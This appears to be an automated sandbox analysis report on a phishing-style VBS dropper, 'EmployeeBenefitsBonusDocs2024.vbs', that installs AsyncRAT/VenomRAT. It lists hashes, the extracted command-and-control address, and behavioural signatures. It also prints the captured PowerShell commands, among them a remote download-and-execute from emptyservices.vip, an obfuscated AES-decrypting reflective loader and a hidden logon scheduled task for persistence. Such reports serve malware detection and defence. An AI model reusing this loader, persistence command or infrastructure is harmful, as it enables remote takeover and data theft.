Analysis
-
max time kernel
93s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-12-2024 16:28
Static task
static1
Behavioral task
behavioral1
Sample
EmployeeBenefitsBonusDocs2024.vbs
Resource
win7-20240729-en
General
-
Target
EmployeeBenefitsBonusDocs2024.vbs
-
Size
66KB
-
MD5
db10d2a27be78c780e5757b46a265e6d
-
SHA1
36f720617c0f2eb5fd700dc06714fb069dea7eb9
-
SHA256
6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d
-
SHA512
58e90ac9142a2221c24bf82eb24207097c2d1121c005db1533c646ce2ed461fc1318eab619a524930094711554436ca02de05a722d12cbad0cbed7da33f307c7
-
SSDEEP
1536:813BEKsxa+9hxSiZUq50BPW8TzigIMGX5TXx2ChW3/V79j8:/KMaYhciZtuFVVIMGJXx2P8
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Dec2024
45.88.88.7:6845
zmkdvkzgwmnzhgvxwwk
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
resource yara_rule behavioral2/memory/448-65-0x0000013BF8A70000-0x0000013BF8A88000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/448-65-0x0000013BF8A70000-0x0000013BF8A88000-memory.dmp family_asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 37 448 powershell.exe -
pid Process 1692 powershell.exe 4720 powershell.exe 448 powershell.exe 536 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1692 powershell.exe 1692 powershell.exe 536 powershell.exe 536 powershell.exe 4720 powershell.exe 4720 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeIncreaseQuotaPrivilege 4720 powershell.exe Token: SeSecurityPrivilege 4720 powershell.exe Token: SeTakeOwnershipPrivilege 4720 powershell.exe Token: SeLoadDriverPrivilege 4720 powershell.exe Token: SeSystemProfilePrivilege 4720 powershell.exe Token: SeSystemtimePrivilege 4720 powershell.exe Token: SeProfSingleProcessPrivilege 4720 powershell.exe Token: SeIncBasePriorityPrivilege 4720 powershell.exe Token: SeCreatePagefilePrivilege 4720 powershell.exe Token: SeBackupPrivilege 4720 powershell.exe Token: SeRestorePrivilege 4720 powershell.exe Token: SeShutdownPrivilege 4720 powershell.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeSystemEnvironmentPrivilege 4720 powershell.exe Token: SeRemoteShutdownPrivilege 4720 powershell.exe Token: SeUndockPrivilege 4720 powershell.exe Token: SeManageVolumePrivilege 4720 powershell.exe Token: 33 4720 powershell.exe Token: 34 4720 powershell.exe Token: 35 4720 powershell.exe Token: 36 4720 powershell.exe Token: SeIncreaseQuotaPrivilege 4720 powershell.exe Token: SeSecurityPrivilege 4720 powershell.exe Token: SeTakeOwnershipPrivilege 4720 powershell.exe Token: SeLoadDriverPrivilege 4720 powershell.exe Token: SeSystemProfilePrivilege 4720 powershell.exe Token: SeSystemtimePrivilege 4720 powershell.exe Token: SeProfSingleProcessPrivilege 4720 powershell.exe Token: SeIncBasePriorityPrivilege 4720 powershell.exe Token: SeCreatePagefilePrivilege 4720 powershell.exe Token: SeBackupPrivilege 4720 powershell.exe Token: SeRestorePrivilege 4720 powershell.exe Token: SeShutdownPrivilege 4720 powershell.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeSystemEnvironmentPrivilege 4720 powershell.exe Token: SeRemoteShutdownPrivilege 4720 powershell.exe Token: SeUndockPrivilege 4720 powershell.exe Token: SeManageVolumePrivilege 4720 powershell.exe Token: 33 4720 powershell.exe Token: 34 4720 powershell.exe Token: 35 4720 powershell.exe Token: 36 4720 powershell.exe Token: SeIncreaseQuotaPrivilege 4720 powershell.exe Token: SeSecurityPrivilege 4720 powershell.exe Token: SeTakeOwnershipPrivilege 4720 powershell.exe Token: SeLoadDriverPrivilege 4720 powershell.exe Token: SeSystemProfilePrivilege 4720 powershell.exe Token: SeSystemtimePrivilege 4720 powershell.exe Token: SeProfSingleProcessPrivilege 4720 powershell.exe Token: SeIncBasePriorityPrivilege 4720 powershell.exe Token: SeCreatePagefilePrivilege 4720 powershell.exe Token: SeBackupPrivilege 4720 powershell.exe Token: SeRestorePrivilege 4720 powershell.exe Token: SeShutdownPrivilege 4720 powershell.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeSystemEnvironmentPrivilege 4720 powershell.exe Token: SeRemoteShutdownPrivilege 4720 powershell.exe Token: SeUndockPrivilege 4720 powershell.exe Token: SeManageVolumePrivilege 4720 powershell.exe Token: 33 4720 powershell.exe Token: 34 4720 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 448 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 388 wrote to memory of 2864 388 WScript.exe 82 PID 388 wrote to memory of 2864 388 WScript.exe 82 PID 2864 wrote to memory of 1692 2864 cmd.exe 84 PID 2864 wrote to memory of 1692 2864 cmd.exe 84 PID 388 wrote to memory of 992 388 WScript.exe 94 PID 388 wrote to memory of 992 388 WScript.exe 94 PID 992 wrote to memory of 536 992 cmd.exe 96 PID 992 wrote to memory of 536 992 cmd.exe 96 PID 536 wrote to memory of 4720 536 powershell.exe 97 PID 536 wrote to memory of 4720 536 powershell.exe 97 PID 536 wrote to memory of 2220 536 powershell.exe 99 PID 536 wrote to memory of 2220 536 powershell.exe 99 PID 2220 wrote to memory of 5080 2220 WScript.exe 100 PID 2220 wrote to memory of 5080 2220 WScript.exe 100 PID 5080 wrote to memory of 448 5080 cmd.exe 102 PID 5080 wrote to memory of 448 5080 cmd.exe 102
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EmployeeBenefitsBonusDocs2024.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content2⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('byPitpttrKOr9S4gS51RiwODtTqtgx9LZXuwqMXWA4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KLxX3z6JPX89+JmQWr32sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZBnGU=New-Object System.IO.MemoryStream(,$param_var); $vupQr=New-Object System.IO.MemoryStream; $leNdx=New-Object System.IO.Compression.GZipStream($ZBnGU, [IO.Compression.CompressionMode]::Decompress); $leNdx.CopyTo($vupQr); $leNdx.Dispose(); $ZBnGU.Dispose(); $vupQr.Dispose(); $vupQr.ToArray();}function execute_function($param_var,$param2_var){ $QBcFyzORlfFvkyN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg=$QBcFyzORlfFvkyN.EntryPoint; $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg.Invoke($null, $param2_var);}$lH = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $lH;$cAKjuebouz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lH).Split([Environment]::NewLine);foreach ($fH in $cAKjuebouz) { if ($fH.StartsWith('::')) { $S=$fH.Substring(2); break; }}$payloads_var=[string[]]$S.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr288_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_288.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_288.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_288.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('byPitpttrKOr9S4gS51RiwODtTqtgx9LZXuwqMXWA4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KLxX3z6JPX89+JmQWr32sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZBnGU=New-Object System.IO.MemoryStream(,$param_var); $vupQr=New-Object System.IO.MemoryStream; $leNdx=New-Object System.IO.Compression.GZipStream($ZBnGU, [IO.Compression.CompressionMode]::Decompress); $leNdx.CopyTo($vupQr); $leNdx.Dispose(); $ZBnGU.Dispose(); $vupQr.Dispose(); $vupQr.ToArray();}function execute_function($param_var,$param2_var){ $QBcFyzORlfFvkyN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg=$QBcFyzORlfFvkyN.EntryPoint; $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg.Invoke($null, $param2_var);}$lH = 'C:\Users\Admin\AppData\Roaming\inicia_str_288.bat';$host.UI.RawUI.WindowTitle = $lH;$cAKjuebouz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lH).Split([Environment]::NewLine);foreach ($fH in $cAKjuebouz) { if ($fH.StartsWith('::')) { $S=$fH.Substring(2); break; }}$payloads_var=[string[]]$S.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:448
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
1KB
MD5ff2ebc63009127bf2c74f18dc727774e
SHA1603a245252097e9b8d6823e08a76361ba94f7720
SHA2565048a68ea6a51a2a93fba28d043dbcc8ae067225e4e1b9569a74caac617e9a42
SHA51215b4baf594f91eba3ad7d390859140220da191bfc9de2eeeca5455a643ce5b19cd88b221e354d6a577df799564cc73285f2418108d2b850630196053ac53007b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
62KB
MD5b318d9f0c62b86e1c78917fa43630e1f
SHA1e57533546987c2f91db873ab2b756bd752deafda
SHA2564b429c11db344779526f0cdacc411ec8835f2682d5212ad5f5b0c1d48020a028
SHA512b0417872bd1234e1ac2ecf80c14396ab92f177d54edeb1cc296b2f51af0138f3bfd11f2431f879ad59abfefb9fa83ec93e4c9ce8e14abd79cd1faf1c9217a75c
-
Filesize
114B
MD5d1d0f729a878d5943a30c1700cfc3c72
SHA13ddfaf32a7203d6770116b88627a7fc530a42698
SHA256ca0773e06fe660c95d26fad85762928696d3a522e2f885a923c4e8081343a4bd
SHA5120a644b21eae9b46b0027d04b4b16d939076d267307051381180c0b581ffde332f18e6c8994dfd77e0bc1620c0ce4284a97c22cbc322495f45d3df85a725d9089